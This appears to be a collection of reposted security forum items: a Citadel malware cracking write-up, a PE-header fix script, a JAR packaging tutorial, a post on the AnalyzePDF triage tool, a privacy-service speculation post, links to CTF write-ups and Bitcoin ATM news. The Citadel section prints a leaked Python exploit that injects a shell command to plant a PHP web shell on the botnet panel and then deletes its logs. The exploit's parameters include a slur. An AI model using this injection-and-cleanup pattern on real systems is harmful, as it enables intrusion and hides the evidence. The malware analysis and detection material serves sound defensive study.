The problem that every cracker was facing with leaked Citadel builders was finding the good HID key. Citadel builders that were previously leaked came without an HID key, e.g.: vortex1772_second - 1.3.5.1. And you can't just 'force' the procedure to generate a bot, because the Citadel stub is encrypted inside; that's why, when the package got leaked with the correct HID, an easy way to crack the builder appeared.
Without the right HID you can still bruteforce it until you break the key, but this is much harder and more time consuming; that solution would also be a greater achievement and more respected as a scene release.

To finish, let's get back to the Citadel backconnect server that was requested on kernelmode.info. This script was also leaked with the Citab package. It's for the Windows box, and it's super secure... oh wait..

import urllib
import urllib2

def request(url, params=None, method='GET'):
    if method == 'POST':
        urllib2.urlopen(url, urllib.urlencode(params)).read()
    elif method == 'GET':
        if params == None:
            urllib2.urlopen(url)
        else:
            urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()

def uploadShell(url, filename, payload):
    data = {
        'b' : 'tapz',
        'p1' : 'faggot',
        'p2' : 'hacker | echo "' + payload + '" >> ' + filename
    }
    request(url + 'test.php', data)

def shellExists(url):
    return urllib.urlopen(url).getcode() == 200

def cleanLogs(url):
    delete = { 'delete' : '' }
    request(URL + 'control.php', delete, 'POST')

URL = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD = '<?php phpinfo(); ?>'

uploadShell(URL, FILENAME, PAYLOAD)
print '[~] Shell created!'

if not shellExists(URL + FILENAME):
    print '[-]', FILENAME, 'not found...'
else:
    print '[+] Go to:', URL + FILENAME

cleanLogs(URL)
print '[~] Logs cleaned!'

Anyway, happy new year guys

Posted by Steven K at 14:28

Sursa: XyliBox: How the protection of Citadel got cracked
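As promised above, a small scripted version of the DOS-header fix from this post (my own sketch, not something from the leaked package; it assumes the PE header really does begin at offset 0x40, as it did in the sample discussed, so always run it on a copy and verify the result afterwards):

# Sketch: restore a zeroed e_lfanew field (the DWORD at offset 0x3C of the
# IMAGE_DOS_HEADER) so PE tools can find the header again. 0x40 is assumed
# to be where the PE header actually starts, as in the sample discussed.
import struct
import sys

def fix_e_lfanew(path, pe_offset=0x40):
    with open(path, 'r+b') as f:
        if f.read(2) != b'MZ':
            raise ValueError('not an MZ/PE file')
        f.seek(0x3C)
        current = struct.unpack('<I', f.read(4))[0]
        print('current e_lfanew: %#x' % current)
        if current == 0:
            f.seek(0x3C)
            f.write(struct.pack('<I', pe_offset))
            print('patched e_lfanew to %#x' % pe_offset)

if __name__ == '__main__':
    fix_e_lfanew(sys.argv[1])   # e.g. a copy of the packed Citadel.exe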
  6. [h=1]How to make a JAR file Linux executable[/h]

Every Java programmer knows - or should know - that it is possible to create a runnable Java package archive (JAR), so that in order to launch an application it is enough to specify the jar file name on the Java interpreter command line along with the -jar parameter. For example:

$ java -jar helloworld.jar

There are plenty of tutorials showing how to implement this feature using Ant, Maven, Eclipse, NetBeans, etc. Anyway, in its basic form it just requires adding a MANIFEST.MF file to the jar package. The manifest must contain a Main-Class entry that specifies the class defining the main method for your application. For example:

$ javac HelloWorld.java
$ echo Main-Class: HelloWorld > MANIFEST.MF
$ jar -cvmf MANIFEST.MF helloworld.jar HelloWorld.class

But this still requires your users to invoke the Java interpreter with the -jar option. There are many reasons why it would be preferable to have your app runnable by simply invoking it on the terminal shell like any other command. Here comes the protip!

This technique is based on the ability to append a generic binary payload to a Linux shell script. Read more about this here: Add a Binary Payload to your Shell Scripts | Linux Journal

Taking advantage of this possibility, the trick is just to embed a runnable jar file into a Bash script file. The script, when executed, will launch the Java interpreter specifying itself as the jar to run. Too complex? Much easier to do in practice than to explain! Let's say that you have a runnable jar named helloworld.jar.

Copy the Bash script below to a file named stub.sh:

#!/bin/sh
MYSELF=`which "$0" 2>/dev/null`
[ $? -gt 0 -a -f "$0" ] && MYSELF="./$0"
java=java
if test -n "$JAVA_HOME"; then
    java="$JAVA_HOME/bin/java"
fi
exec "$java" $java_args -jar $MYSELF "$@"
exit 1

Then append the jar file to the saved script and grant execute permission to the resulting file with the following command:

cat stub.sh helloworld.jar > helloworld.run && chmod +x helloworld.run

That's all! Now you can execute the app by just typing ./helloworld.run in your shell terminal. The script is smart enough to pass any command line parameters to the Java application transparently. Cool! Isn't it?!

In case you are a Windows guy, obviously this will not work (unless you run a Linux compatibility layer like Cygwin). Anyway, there are tools that can wrap a Java application into a native Windows .exe binary file, producing a result similar to the one explained in this tutorial. See for example Launch4j - Cross-platform Java executable wrapper

Sursa: https://coderwall.com/p/ssuaxa
  7. [h=3]AnalyzePDF - Bringing the Dirt Up to the Surface[/h]

[h=2]What is that thing they call a PDF?[/h]

The Portable Document Format (PDF) is an old format ... it was created by Adobe back in 1993 as an open standard but wasn't officially released as an open standard (ISO 32000-1) until 2008 - right @nullandnull? I can't take credit for the nickname that I call it today, Payload Delivery Format, but I think it's clever and applicable enough to mention. I did a lot of painful reading through the PDF specifications in the past and if you happen to do the same I'm sure you'll also have a lot of "hm, that's interesting" thoughts as well as many "wtf, why?" thoughts. I truly encourage you to go out and do the same... it's a great way to learn about the internals of something, what to expect and what would be abnormal.

The PDF has become a de facto standard for transferring files, presentations, whitepapers etc. <rant> How about we stop releasing research/whitepapers about PDF 0-days/exploits via a PDF file... seems a bit backwards</rant> We've all had those instances where you wonder if a file is malicious or benign ... do you trust the sender or was it downloaded from the Internet? Do you open it or not? We might be a bit more paranoid than most people when it comes to this type of thing, but since PDFs are so common they're still a reliable delivery method for malicious actors. As the PDF contains many 'features', these features often turn into 'vulnerabilities' (do we really need to embed an exe into our PDF? or play a SWF game?). Good thing it doesn't contain any vulnerabilities, right? (To be fair, the sandboxed versions and other security controls these days have helped significantly.) Adobe Acrobat Reader : CVE security vulnerabilities, versions and detailed reports

[h=3]What does a PDF consist of?[/h]

In its most basic format, a PDF consists of four components: header, body, cross-reference table (Xref) and trailer: (sick M$ Paint skillz, I know) If we create a simple PDF (this example only contains a single word in it) we can get a better idea of the contents we'd expect to see:

[h=2]What else is out there?[/h]

Since PDF files are so common these days there's no shortage of tools to rip them apart and analyze them. Some of the information contained in this post and within the code I'm releasing may overlap with others out there, but that's mainly because our research produced similar results or our minds think alike... I'm not going to touch on every tool out there, but there are some that are worth mentioning as I either still use them in my analysis process or some of their functionality (or lack of functionality) is what sparked me to write AnalyzePDF. By mentioning the tools below my intention isn't to downplay them and/or their ability to analyze PDFs, but rather to help show the reasons I ended up doing what I did.

[h=4]pdfid/pdf-parser[/h]

Didier Stevens created some of the first analysis tools in this space, which I'm sure you're already aware of. Since they're bundled into distros like BackTrack/REMnux already, they seem like good candidates to leverage for this task. Why recreate something if it's already out there? Like some of the other tools, it parses the file structure and presents the data to you... but it's up to you to be able to interpret that data. Because these tools are commonly available on distros and get the job done, I decided they were the best to wrap around.
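For what it's worth, a rough idea of what "wrapping around" pdfid can look like from Python (this is not AnalyzePDF's actual code; the path to pdfid.py and the assumption that its report lines end in a keyword/count pair are mine):

# Rough sketch of wrapping pdfid instead of re-implementing it. The pdfid.py
# path and the "keyword ... count" output layout are assumptions, not facts
# about AnalyzePDF; adjust both for your own setup.
import subprocess

PDFID = '/usr/local/bin/pdfid.py'   # hypothetical location, e.g. on REMnux

def pdfid_counts(pdf_path):
    out = subprocess.check_output(['python', PDFID, pdf_path],
                                  universal_newlines=True)
    counts = {}
    for line in out.splitlines()[1:]:            # skip the banner line
        parts = line.split()
        if len(parts) >= 2 and parts[-1].isdigit():
            counts[' '.join(parts[:-1])] = int(parts[-1])
    return counts

if __name__ == '__main__':
    print(pdfid_counts('sample.pdf'))            # hypothetical sample name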
Did you know that pdfid has a lot more capabilities/features that most aren't aware of? If you run it with the (-h) switch you'll see some other useful options such as (-e), which displays extra information. Of particular note here is the mention of "%%EOF", "After last %%EOF", create/mod dates and the entropy calculations.

During my data gathering I encountered a few hiccups that I hadn't previously experienced. This is expected, as I was testing a large data set of who knows what kind of PDFs. Again, I'm not noting these to put down anyone's tools, but I feel it's important to be aware of what the capabilities and limitations of something are - and also in case anyone else runs into something similar so they have a reference. Because of some of these, I am including a slightly modified version of pdfid as well. I haven't tested whether the newer version fixed anything, so I'd rather give everyone the files that I know work with it.

I first experienced a similar error as mentioned here when using the (-e) option on a few files (e.g. cbf76a32de0738fea7073b3d4b3f1d60). It appears it doesn't count multiple '%%EOF's: if the '%%EOF' is the last thing in the file without a '\r' or '\n' behind it, it doesn't seem to count it.
I've had cases where the '/Pages' count was incorrect - there were (15) PDFs that showed '0' pages during my tests. One way I tried to get around this was to use the (-a) option and test between the '/Page' and '/Pages' values (e.g. ac0487e8eae9b2323d4304eaa4a2fdfce4c94131).
There were times when the number of characters after the last '%%EOF' was incorrect.
It won't flag on JavaScript if it's written like "<script contentType="application/x-javascript">" (e.g. cbf76a32de0738fea7073b3d4b3f1d60):

[h=4]peepdf[/h]

Peepdf has gone through some great development over the course of me using it and definitely provides some great features to aid in your analysis process. It has some intelligence built into it to flag on things and also allows one to decode things like JavaScript from the current shell. Even though it has a batch/automated mode, it still feels like more of a tool that I want to use to analyze a single PDF at a time and dig deep into the file's internals. Originally, this tool didn't match keywords if they had spaces after them, but it was a quick and easy fix... glad this testing could help improve another user's work.

[h=4]PDFStreamDumper[/h]

PDFStreamDumper is a great tool with many sweet features, but it has its uses and limitations like all things. It's a GUI built for analysis on Windows systems, which is fine, but its power comes from analyzing a single PDF at a time - and again, it's still mostly a manual process.

[h=4]pdfxray/pdfxray_lite[/h]

Pdfxray was originally an online tool but Brandon created a lite version so it could be included in REMnux (it used to be publicly accessible but at the time of writing this looks like that might have changed). If you look back at some of Brandon's work historically, he's also done a lot in this space, and since I encountered some issues with other tools and noticed he did as well in the past, I know he's definitely dug deep and used that knowledge for his tools. Pdfxray_lite has the ability to query VirusTotal for the file's hash and produce a nice HTML report of the file's structure - which is great if you want to include that in an overall report, but again this requires the user to interpret the parsed data.

[h=4]pdfcop[/h]

Pdfcop is part of the Origami framework.
There are some really cool tools within this framework, but I liked the idea of analyzing a PDF file and alerting on badness. This particular tool in the framework has that ability; however, I noticed that if it flagged on one cause then it wouldn't continue analyzing the rest of the file for other things of interest (e.g. I've had it close the file out right away if there was an invalid Xref, without looking at anything else. This is because PDFs are read from the bottom up, meaning their Xref tables are read first in order to determine where to go next). I can see the argument that there's no point continuing to analyze a file that has already been flagged as bad, but that feels like too much tunnel vision for me. I personally prefer to know more rather than less... especially if I want to do trending/stats/analytics.

[h=2]So why create something new?[/h]

While there is a wealth of PDF analysis tools these days, there was a noticeable gap: tools with some intelligence built into them in order to help automate certain checks or alert on badness. In fairness, some (try to) detect exploits based on keywords or flag suspicious objects based on their contents/names, but that's generally the extent of it. I use a lot of the above mentioned tools when I'm handed a file and someone wants to know if it's malicious or not... but what about when I'm not around? What if I'm focused/dedicated to something else at the moment? What if there are wayyyy too many files for me to manually go through each one? Those are the kinds of questions I had to address, and as a result I felt I needed to create something new. Not necessarily write something from scratch... I mean, why waste that time if I can leverage other things out there and tweak them to fit my needs?

[h=3]Thought Process[/h]

What do people typically do when trying to determine if a PDF file is benign or malicious? Maybe scan it with A/V and hope something triggers, run it through a sandbox and hope the right conditions are met to trigger, or take them one at a time through one of the above mentioned tools? They're all fine workflows, but what if you discover something unique, or come across it enough times to create a signature/rule out of it so you can trigger on it in the future? We tend to have a lot to remember, so doing one-off analysis may result in us forgetting something that we previously discovered. Additionally, this doesn't scale too well in the sense that everyone on your team might not have the same knowledge that you do... so we need some consistency/intelligence built in to try and compensate for these things.

I felt it was better to use the characteristics of a malicious file (either known, or observed from combinations within malicious files) to evaluate what would indicate a malicious file, instead of just adding points for every questionable attribute observed. e.g. - instead of adding a point for being a one page PDF, make a condition that says: if you see an invalid xref and a one page PDF, then give it a score of X. This makes the conditions more accurate in my eyes since, for example, a single page PDF by itself isn't malicious, but if it also contains other questionable things then it should carry a heavier weight of being malicious (a small scoring sketch along these lines appears at the end of this post). Another example is JavaScript within a PDF. While statistics show JavaScript within a PDF is a high indicator that it's malicious, there are still legitimate reasons for JavaScript to be within a PDF (e.g.
to calculate a purchase order form or verify that you correctly entered all the information the form requires).

[h=3]Gathering Stats[/h]

At the time I was performing my PDF research and determining how I wanted to tackle this task, I wasn't really aware of machine learning. I feel that would be a better path to take in the future, but the way I gathered my stats/data was in a similar (less automated/cool AI) way. There's no shortage of PDFs out there, which is good for us as it can help us determine what's normal, malicious, or questionable, and leverage that intelligence within a tool. If you need some PDFs to gather stats on, contagio has a pretty big bundle to help get you started. Another resource is Govdocs from Digital Corpora ... or a simple Google dork. (Note: spidering/downloading these will give you files, but they still need to be classified as good/bad for initial testing.) Be aware that you're going to come across files that someone may mark as good but that actually show signs of badness... always interesting to detect these types of things during testing!

[h=4]Stat Gathering Process[/h]

So now that I have a large set of files, what do I do? I can't just rely on their file extensions or someone else saying they're malicious or benign, so how about something like this:

Verify it's a PDF file. When reading through the PDF specs I noticed that the PDF header can be within the first 1024 bytes of the file, as stated in 3.4.1, 'File Header' of Appendix H: "Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file."... that's a long way down compared to the traditional header, which is usually right at the beginning of a file. So what does that mean for us? Well, if we rely solely on something like file or TRiD they _might_ not properly identify/classify a PDF that has the header that far into the file, as most only look within the first 8 bytes (an unfair example is from corkami). We can compensate for this within our code/create a YARA rule etc. (a minimal check along these lines is sketched just before the Stats section below)... you don't believe me, you say? Fair enough, I don't believe things unless I try them myself either: the file to the left is properly identified as a PDF file, but when I created a copy of it and modified it so the header was a bit lower, the tools failed. The PDF on the right is still in accordance with the PDF specs and PDF viewers will still open it (as shown)... so this needs to be taken into consideration.
[*]Get rid of duplicates (based on SHA256 hash) for files in the same category (clean vs. dirty), then again across the entire data set afterwards, to make sure there are no duplicates between the clean and dirty sets.
[*]Run pdfid & pdfinfo over the file to parse out their data. These two are already included in REMnux so I leveraged them. You can swap in other tools, but this made it flexible for me and I knew the tool would work when run on this distro; pdfinfo parsed some of the data better during tests, so getting the best of both of them seemed like the best approach.
[*]Run scans for low hanging fruit/known badness with local A/V || YARA.

Now that we have a more accurate data set classified:
[*]Are all PDFs classified as benign really benign?
[*]Are all PDFs classified as malicious really malicious?
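A minimal sketch of two of those quick structural checks (the function names are mine, not AnalyzePDF's; the 1024-byte window comes from the spec quote above and the 300-character trailing-data rule of thumb from the stats below):

# Minimal sketch of two cheap structural checks discussed above (names and
# layout are mine): where is the %PDF- header, and how many bytes trail the
# last %%EOF marker?
def pdf_header_offset(path):
    with open(path, 'rb') as f:
        head = f.read(1024)        # spec: header may sit anywhere in the first 1024 bytes
    return head.find(b'%PDF-')     # -1 means no header found in that window

def bytes_after_last_eof(path):
    with open(path, 'rb') as f:
        data = f.read()
    marker = data.rfind(b'%%EOF')
    if marker == -1:
        return None                # no %%EOF at all - suspicious by itself
    return len(data) - (marker + len(b'%%EOF'))

if __name__ == '__main__':
    import sys
    for name in sys.argv[1:]:
        print(name,
              'header offset:', pdf_header_offset(name),
              'bytes after last %%EOF:', bytes_after_last_eof(name))

Both values are cheap to compute and feed nicely into the kind of conditional scoring discussed earlier.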
[h=3]Stats[/h]

Files analyzed (no duplicates found between clean & dirty):

[TABLE=width: 50%]
[TR] [TH]Class[/TH] [TH]Type[/TH] [TH]Count[/TH] [/TR]
[TR] [TD]Dirty[/TD] [TD]Pre-Dup[/TD] [TD]22,342[/TD] [/TR]
[TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]11,147[/TD] [/TR]
[TR] [TD]Clean[/TD] [TD]Pre-Dup[/TD] [TD]2,530[/TD] [/TR]
[TR] [TD]Clean[/TD] [TD]Post-Dup[/TD] [TD]2,529[/TD] [/TR]
[TR] [TD=colspan: 2]Total Files Analyzed:[/TD] [TD]13,676[/TD] [/TR]
[/TABLE]

I've collected more than enough data to put together a paper or presentation, but I feel that's been played out already, so if you want more than what's outlined here just ping me. Instead of dragging this post on for a while showing each and every stat that was pulled, I feel it might be more useful to show a high level comparison of what was detected the most in each set and some anomalies.

[h=4]Ah-Ha's[/h]

None of the clean files had incorrect file headers/versions
There wasn't a single keyword/attribute parsed from the clean files that covered more than 4.55% of its entire data set class. This helps show the uniqueness of these files vs. malicious actors reusing things.
The dates within the clean files were generally unique while the date fields on the dirty files were more clustered together - again, reuse?
None of the values for the keywords/attributes of the clean files were flagged as trying to be obfuscated by pdfid
Clean files never had '/Colors > 2^24' above 0 while some dirty files did
Rarely did a clean file have a high count of JavaScript in it while dirty files ranged from 5-149 occurrences per file
'/JBIG2Decode' was never above '0' in any clean file
'/Launch' wasn't used much in either of the data sets but was still more common in the dirty ones
Dirty files have far more characters after the last %%EOF (starting from 300+ characters is a good check)
Single page PDF's have a higher likelihood of being malicious - no duh
'/OpenAction' is far more common in malicious files

[h=4]YARA signatures[/h]

I've also included some PDF YARA rules that I've created as a separate file so you can use those to get started. YARA isn't really required, but I'm making it that way for the time being because it's helpful... so I have the default rules location pointing to REMnux's copy of MACB's rules unless otherwise specified.

Clean data set:
Dirty data set:
Signatures that triggered across both data sets:

Cool... so we know we have some rules that work well and others that might need adjusting, but they still help!

[h=4]What to look for[/h]

So we have some data to go off of... what are some additional things we can take away from all of this and incorporate into our analysis tool so we don't forget about them and/or stop repetitive steps?

Header
In addition to possibly being after the first 8 bytes, I found it useful to look at the specific version within the header. This should normally look like "%PDF-M.N." where M.N is the Major/Minor version... however, the above mentioned 'low header' needs to be looked for as well. Knowing this, we can look for invalid PDF version numbers or, digging deeper, we can correlate the PDF's features/elements to the version number and flag on mismatches.
Here're some examples of what I mean, and more reasons why reading those dry specs are useful: If FlateDecode was introduced in v1.2 then it shouldn't be in any version below If JavaScript and EmbeddedFiles were introduced in v1.3 then they shouldn't be in any version below If JBIG2 was introduced in v1.4 then it shouldn't be in any version below [*]Body This is where all of the data is (supposed to be) stored; objects (strings, names, streams, images etc.). So what kinds of semi-intelligent things can we do here? Look for object/stream mismatches. e.g - Indirect Objects must be represented by 'obj' and 'endobj' so if the number of 'obj' is different than the number of 'endobj' mentions then it might be something of interest Are there any questionable features/elements within the PDF? JavaScript doesn't immediately make the file malicious as mentioned earlier, however, it's found in ~90% of malicious PDF's based on others and my own research. '/RichMedia' - indicates the use of Flash (could be leveraged for heap sprays) '/AA', '/OpenAction', '/AcroForm' - indicate that an automatic action is to be performed (often used to execute JavaScript) '/JBIG2Decode', '/Colors' - could indicate the use of vulnerable filters; Based on the data above maybe we should look for colors with a value greater than 2^24 '/Launch', '/URL', '/Action', '/F', '/GoToE', '/GoToR' - opening external programs, places to visit and redirection games Obfuscation Multiple filters ('/FlateDecode', '/ASCIIHexDecode', '/ASCII85Decode', '/LZWDecode', '/RunLengthDecode') The streams within a PDF file may have filters applied to them (usually for compressing/encoding the data). While this is common, it's not common within benign PDF files to have multiple filters applied. This behavior is commonly associated with malicious files to try and thwart A/V detection by making them work harder. Separating code over multiple objects Placing code in places it shouldn't be (e.g. - Author, Keywords etc.) White space randomization Comment randomization Variable name randomization String randomization Function name randomization Integer obfuscation Block randomization Any suspicious keywords that could mean something malicious when seen with others? eval, array, String.fromCharCode, getAnnots, getPageNumWords, getPageNthWords, this.info, unescape, %u9090 [*]Xref The first object has an ID 0 and always contains one entry with generation number 65535. This is at the head of the list of free objects (note the letter ‘f’ that means free). The last object in the cross reference table uses the generation number 0. Translation please? Take a look a the following Xref: Knowing how it's supposed to look we can search for Xrefs that don't adhere to this structure. [*]Trailer Provides the offset of the Xref (startxref) Contains the EOF, which is supposed to be a single line with "%%EOF" to mark the end of the trailer/document. Each trailer will be terminated by these characters and should also contain the '/Prev' entry which will point to the previous Xref. Any updates to the PDF usually result in appending additional elements to the end of the file This makes it pretty easy to determine PDF's with multiple updates or additional characters after what's supposed to be the EOF [*]Misc. Creation dates (both format and if a particular one is known to be used) Title Author Producer Creator Page count [h=2]The Code[/h] So what now? We have plenty of data to go on - some previously known, but some extremely new and helpful. 
It's one thing to know that most files with JavaScript, or that are one (1) page, have a higher tendency of being malicious... but what about some of the other characteristics of these files? By themselves, a single keyword/attribute might not stick out that much, but what happens when you start to combine them together? Welp, hang on because we're going to put this all together.

[h=3]File Identification[/h]

In order to account for the header issue, I decided the tool itself would look within the first 1024 bytes instead of relying on other file identification tools. Another way, so this could be detected whether this tool was used or not, was to create a YARA rule such as:

[h=3]Wrap pdfinfo[/h]

Through my testing I found this tool to be more reliable than pdfid in some areas, such as:
Determining if there are any Xref errors produced when trying to read the PDF
Looking for any unterminated hex strings etc.
Detecting EOF errors

[h=3]Wrap pdfid[/h]

Read the header. *pdfid will show exactly what's there and not try to convert it*
_Attempt_ to determine the number of pages
Look for object/stream mismatches
Not only look for JavaScript but also determine if there's an abnormally high amount
Look for other suspicious elements commonly used for malicious purposes (AcroForm, OpenAction, AdditionalAction, Launch, Embedded files etc.)
Look for data after EOF
Calculate a few different entropy scores

Next, perform some automagical checks and hold on to the results for later calculations.

[h=3]Scan with YARA[/h]

While there are some pre-populated conditions that score a ranking built into the tool already, the ability to add/modify your own is extremely easy. Additionally, since I'm a big fan of YARA, I incorporated it into this as well. There are many benefits to this, such as being able to write a rule for header evasion, version-number-to-element mismatching, or even flagging on known malicious authors or producers. The biggest strength, however, is the ability to add a 'weight' field in the meta section of the YARA rules. What this does is allow the user to determine how good a rule it is and, if the rule triggers on the PDF, hold on to its weighted value and incorporate it later in the overall calculation process, which might increase the file's maliciousness score. Here's what the YARA parsing looks like when checking the meta field: And here's another YARA rule with that section highlighted for those who aren't sure what I'm talking about:

If the (-m) option is supplied, then if _any_ YARA rule triggers on the PDF file it will be moved to another directory of your choosing. This is important to note because one of your rules may hit on the file but it may not be displayed in the output, especially if it doesn't have a weight field. Once the analysis has completed, the calculation process starts. This is two-phase: anything noted from pdfinfo and pdfid is evaluated against some pre-determined combinations I configured. These are easy enough to modify as needed, but they've been very reliable in my testing... but hey, things change! Instead of moving on once one of the combination sets is met, I allow the scoring to go through each one and add the additional points to the overall score, if warranted. This allows several 'smaller' things to bundle up into something of interest rather than passing them up individually. Any YARA rule that triggered on the PDF file has its weighted value parsed from the rule and added to the overall score.
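To illustrate the weight mechanic described above, here is a minimal sketch of my own (using the yara-python bindings; the rule content is illustrative and not one of the tool's actual signatures) showing a weighted rule and how a script could pull that weight out of the meta section:

import yara

# Illustrative rule: a 'weight' entry in the meta section is the convention being described.
RULE_SOURCE = r'''
rule pdf_low_header
{
    meta:
        description = "PDF header not at offset 0 but within the first 1024 bytes"
        weight = 3
    strings:
        $magic = "%PDF-"
    condition:
        $magic in (0..1024) and not ($magic at 0)
}
'''

def yara_weight_score(path):
    rules = yara.compile(source=RULE_SOURCE)
    score = 0
    for match in rules.match(path):
        # Add the rule's weight to the running total; rules without a weight add nothing.
        score += int(match.meta.get('weight', 0))
    return score

print(yara_weight_score('sample.pdf'))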
This helps bump up a file's score or immediately flag it as suspicious if you have a rule you really want to alert on. So what does it look like in action? Here's a picture I tweeted a little while back of it analyzing a PDF exploiting CVE-2013-0640:

[h=3]Download[/h]

I've had this code for quite a while and haven't gotten around to writing up a post to release it with, but after reading a former coworker's blog post last night I realized it was time to just write something up and get this out there, as there are still people asking for something that employs some of these capabilities (e.g. - weight ranking). Is this 100% right all the time? No... let's be real. I've come across situations where a file that was benign was flagged as malicious based on its characteristics, and that's going to happen from time to time. Not all PDF creators adhere to the required specifications, and some users think it's fun to embed or add things to PDF's when it's not necessary. What this helps to do is give a higher ranking to files that require closer attention, or help someone determine if they should open a file right away vs. send it to someone else for analysis (e.g. - deploy something like this on a web server somewhere and let the user upload their questionable file to it and get back a "yes, it's ok" -or- "no, sending it for analysis").

AnalyzePDF can be downloaded on my github

[h=2]Further Reading[/h]
Research papers (one | two | three) [PDF]
PDFTricks
PDF Overview

Posted by hiddenillusion

Sursa: :: hiddenillusion ::: AnalyzePDF - Bringing the Dirt Up to the Surface
  8. AnalyzePDF.py Analyzes PDF files by looking at their characteristics in order to add some intelligence into the determination of them being malicious or benign. Requirements * pdfid * pdfinfo * yara Usage $ python AnalyzePDF.py -h usage: AnalyzePDF.py [-h] [-m MOVE] [-y YARARULES] Path Produces a high level overview of a PDF to quickly determine if further analysis is needed based on it's characteristics positional arguments: Path Path to directory/file(s) to be scanned optional arguments: -h, --help show this help message and exit -m MOVE, --move MOVE Directory to move files triggering YARA hits to -y YARARULES, --yararules YARARULES Path to YARA rules. Rules should contain a weighted score in the metadata section. (i.e. weight = 3) example: python AnalyzePDF.py -m tmp/badness -y foo/pdf.yara bar/getsome.pdf Restrictions Free to use for non-commercial. Give credit where credit is due. Sursa & Download: https://github.com/hiddenillusion/AnalyzePDF
9. [h=1]A Tor-like service run by former NSA/TAO Director & CIA National Clandestine Service Senior Officer[/h]Hi all, there's a Tor-like service run by a former NSA/TAO Director and a CIA National Clandestine Service Senior Officer. It appears to be a commercial onion routing privacy service for US enterprises and government agencies. It's called NetAbstraction: NetAbstraction | Internet Privacy Protection "NetAbstraction is a Cloud-based service that obscures and varies your network pathways, while protecting your identity and your systems." They say they fully cooperate with law enforcement (from NetAbstraction | Internet Privacy Protection). Behind NetAbstraction there's a company, Cutting Edge CA: Cutting Edge C. A. | Advanced Cloud Applications. The president and CTO of Cutting Edge CA is a former NSA "Tailored Access Operations" (TAO) senior leader, Ms. Barbara Hunt (Barbara Hunt | LinkedIn). From Ms. Hunt's LinkedIn public profile: "My last position in the Intelligence Community (2008-2012) was as Director of Capabilities for Tailored Access Operations at the National Security Agency. As a member of NSA/TAO's senior leadership team, was responsible for end-to-end development and capabilities delivery for a large scale computer network exploitation effort." Also working there is Mr. Bay, a former CIA Senior Operations Officer with 24 years in the National Clandestine Service. From Cutting Edge C. A. | Advanced Cloud Applications: "Mr. Bay is a retired CIA Senior Operations Officer with 24 years of experience conducting a full range of intelligence operations for the National Clandestine Service, including operational innovation and implementation of telecommunications and information technology programs. Mr. Bay also brings extensive experience in alternate persona research, planning, acquisition, and use." It would be very interesting if someone spent some more time investigating it, to get a more in-depth picture than just my early OSINT. Former spies, experts in COMINT and SIGINT, running an online privacy service? mmmmmmmmmmm... -- Fabio Pietrosanti (naif) HERMES - Center for Transparency and Digital Human Rights HERMES Center for Transparency and Digital Human Rights - Makers of Tor2Web, GlobaLeaks, LeakDirectory - http://globaleaks.org - tor2web: browse the anonymous internet

Sursa: https://lists.torproject.org/pipermail/tor-talk/2014-January/031554.html
10. 30C3 CTF writeups collection

PWN
cwitscher 350 http://pastebin.com/jMbTX521
bittorrent 400
todos 300 http://codezen.fr/2013/12/30c3-ctf-pwn-300-todos-write-up-sql-injection-ret2libc/ http://balidani.blogspot.in/2013/12/30c3-ctf-todos-writeup.html
bigdata 400
DOGE1 100 http://thehackerblog.com/such-ctf-very-wow-30c3-doge1-writeup/ http://tasteless.se/2013/12/30c3-ctf-doge1-writeup/
DOGE2 400 http://pastebin.com/81CY5Pg2
HolyChallenge 500 http://blog.dragonsector.pl/2013/12/30c3-ctf-holychallenge-pwn-500.html

SANDBOX
int80 300 http://blog.dragonsector.pl/2013/12/30c3-ctf-int80-sandbox-300.html
yass 400
PyExec 300 http://blog.dragonsector.pl/2013/12/30c3-ctf-pyexec-sandbox-300.html http://delimitry.blogspot.in/2013/12/30c3-ctf-2013-sandbox-300-pyexec-writeup.html

MISC
notesEE 400
rsync 200 http://tasteless.se/2013/12/30c3-ctf-rsync-writeup/ http://dr0x0n.blogspot.in/2013/12/writeup-30c3-ctf-2013-rsync-200-rsync.html
cableguy 100

NUMBERS
fourier 200 http://d.hatena.ne.jp/waidotto/20131230
guess 100 http://tasteless.se/2013/12/30c3-ctf-guess-writeup/
matsch 300
angler 300 http://blog.zachorr.com/30C3-CTF-Numbers-300-angler/

Posted by Deva
30C3 CTF – PWN 300
11. Bitcoin ATMs Are Spreading Across the World BY Brian Patrick Eha | December 31, 2013 Sometimes the future can sneak up on you. Like when you find out that a startup incorporated in the British Virgin Islands, whose employees live in New Hampshire and whose products are made in Portugal, is selling digital-currency ATMs to Saudi Arabia and Singapore. These are only two of the countries that have purchased Bitcoin ATMs from manufacturer Lamassu, which announced Monday that it had sold 120 of the machines to customers all over the world. A map Lamassu created to mark the occasion, showing the far-flung sales locations of its Bitcoin ATMs, not coincidentally illustrates the global appeal of Bitcoin. Zach Harvey, Lamassu's chief executive, said as much in a press release. "We will be shipping to 25 different countries, ranging from Canada to Kyrgyzstan, and we've translated our user interface into more than a dozen languages, including Russian, Chinese and Friulian," Harvey said. Lamassu has delivered about a dozen ATMs so far, with plans to ship the others in spring 2014. In October 2013, another company, Robocoin, made headlines for its Bitcoin ATM, said to be the first in the world that was available to the public, when one of its machines was installed in a coffee house in Vancouver. Within its first month in operation, the ATM had processed more than CAD$1 million in transactions. Robocoin's machine, which costs $20,000, or four to five times as much as Lamassu's (the company offers price discounts for bulk orders), allows users both to buy bitcoins with paper bills and to withdraw cash by selling bitcoins. Lamassu's table-top ATM, which is much more compact than Robocoin's kiosk, cannot provide cash in exchange for bitcoins, only the other way around. Although Bitcoin ATMs are still in their infancy, they already represent a contentious space, in which each company is jealous of its claim to fame. After Business Insider Australia reported Monday that a company called 21st Century Bitcoin Exchange was setting up the first Bitcoin ATM in Australia, Lamassu corrected the news site on Twitter, saying it had already installed one of its own ATMs in Melbourne, with "about 15 more on their way." Robocoin's chief executive, for his part, took a shot at buy-only machines such as Lamassu's when his company's ATM debuted this past August. "Seriously, how bush league is an 'ATM' if it can't do the equivalent of deposits and withdrawals?" Robocoin CEO Jordan Kelley said. Lamassu will be presenting its Bitcoin ATM for trial use at the CES Startup Debut event in Las Vegas on January 5, prior to the Consumer Electronics Show that will kick off two days later. After one of Lamassu's machines was installed in Bratislava, Slovakia, a local man named Juraj Bednár created a video demonstrating how easy it is to use. "It's always exciting for a young startup to have sales ramp up," Harvey said in the release. "But what's really thrilling for us is to know that these will be out in the wild, providing millions of people with effortless access to Bitcoin every single day." Sursa: Bitcoin ATMs 